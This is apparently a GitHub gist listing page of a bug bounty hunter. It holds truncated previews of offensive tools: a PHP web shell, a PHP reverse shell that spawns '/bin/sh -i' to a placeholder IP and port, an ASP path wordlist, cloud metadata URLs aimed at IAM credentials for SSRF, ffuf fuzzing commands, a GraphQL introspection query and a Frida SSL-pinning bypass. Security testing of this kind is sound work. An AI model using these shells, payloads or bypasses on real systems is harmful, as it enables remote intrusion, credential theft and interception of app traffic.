This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files=more paths,parameters->more vulns)
Naveen J thevillagehacker
🎯
thevillagehacker
/ Powny_shell.php
Created
February 7, 2021 06:38
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| function featureShell($cmd, $cwd) { | |
| $stdout = array(); | |
| if (preg_match("/^\s*cd\s*$/", $cmd)) { | |
| // pass | |
| } elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) { | |
| chdir($cwd); | |
| preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); |
thevillagehacker
/ php_reverseshell.php
Created
February 7, 2021 06:37
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| set_time_limit (0); | |
| $VERSION = "1.0"; | |
| $ip = 'IP'; // CHANGE THIS | |
| $port = PORT; // CHANGE THIS | |
| $chunk_size = 1400; | |
| $write_a = null; | |
| $error_a = null; | |
| $shell = 'uname -a; w; id; /bin/sh -i'; | |
| $daemon = 0; |
thevillagehacker
/ asp_lowercase.txt
Created
February 3, 2021 06:16
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sound/pci/cs46xx/imgs/cwcdma.asp | |
| sites/all/libraries/ckeditor/ckeditor.asp | |
| sites/all/libraries/ckeditor/_samples/asp/events.asp | |
| sites/all/libraries/ckeditor/_samples/asp/sample_posteddata.asp | |
| sites/all/libraries/ckeditor/_samples/asp/standalone.asp | |
| sites/all/libraries/ckeditor/_samples/asp/replaceall.asp | |
| sites/all/libraries/ckeditor/_samples/asp/advanced.asp | |
| sites/all/libraries/ckeditor/_samples/asp/replace.asp | |
| src/main/webapp/static/my97datepicker/docs/demo/resource/main.asp | |
| library/custom_template/ckeditor/_samples/asp/replaceall.asp |
thevillagehacker
/ JavascriptRecon.md
Created
January 28, 2021 01:58
My Javascript Recon Process - BugBounty
thevillagehacker
/ Cloud_Meta_Data_history.md
Last active
January 25, 2021 10:39
- http://169.254.169.254/latest/user-data
- http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
- http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
- http://169.254.169.254/latest/meta-data/ami-id
- http://169.254.169.254/latest/meta-data/reservation-id
- http://169.254.169.254/latest/meta-data/hostname
- http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "bufio" | |
| "flag" | |
| "fmt" | |
| "net" | |
| "os" | |
| "sync" | |
| ) |
thevillagehacker
/ ffuf_oneline.sh
Created
December 8, 2020 04:08
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Basic Usage | |
| ffuf -w wordlist.txt -u http://127.0.0.1:8000/api/FUZZ/6 -o output.txt -replay-proxy http://127.0.0.1:8080 | |
| # Basic Usage With a Cookie | |
| ffuf -w wordlist.txt -u http://127.0.0.1:8000/api/FUZZ/6 -o output.txt -replay-proxy http://127.0.0.1:8080 -b "laravel_session=eyJpdiI6Ii8wQU11dTVlUkg2alRHUXBIVzlGSnc9PSIsInZhbHVlIjoiOWs3YllJWTdqNC9xa1pMeFRvMFh0OE1vRFpaWm9GSzFkRktVZS9yUHBDM0lIazZ4K0NsbndxWVIxQ05VZWhqZUZaR0RGQWlFdmdDc24yWllYRklGSXI5STd2b05Pam4yRXIwV1BUWkZhUnFLNUFzOWsycmRHcnlxS0FqRWNsSnEiLCJtYWMiOiI3ZTliMmM2YzIxOTExNDE0NmVjYTYyMGI4Nzg4YzJiYjNmNjVkNDI1YzEyODYwMzY5YzczNzY3NTUwZDk0OGYzIn0%3D;" | |
| # Adding a delay | |
| ffuf -w wordlist.txt -u http://127.0.0.1:8000/api/FUZZ/6 -o output.txt -replay-proxy http://127.0.0.1:8080 –p 1 –t 3 | |
| # Adding a delay (new method) |
thevillagehacker
/ GraphQL-Introspection.graphql
Created
November 24, 2020 08:25
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| query IntrospectionQuery { | |
| __schema { | |
| queryType { name } | |
| mutationType { name } | |
| subscriptionType { name } | |
| types { | |
| ...FullType | |
| } | |
| directives { | |
| name |
thevillagehacker
/ android-ssl-bypass.js
Created
November 23, 2020 09:51
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Android SSL Re-pinning frida script v0.2 030417-pier | |
| $ adb push burpca-cert-der.crt /data/local/tmp/cert-der.crt | |
| $ frida -U -f it.app.mobile -l frida-android-repinning.js --no-pause | |
| https://techblog.mediaservice.net/2017/07/universal-android-ssl-pinning-bypass-with-frida/ | |
| UPDATE 20191605: Fixed undeclared var. Thanks to @oleavr and @ehsanpc9999 ! | |
| */ |
thevillagehacker
/ tmux-help.md
Created
November 23, 2020 09:41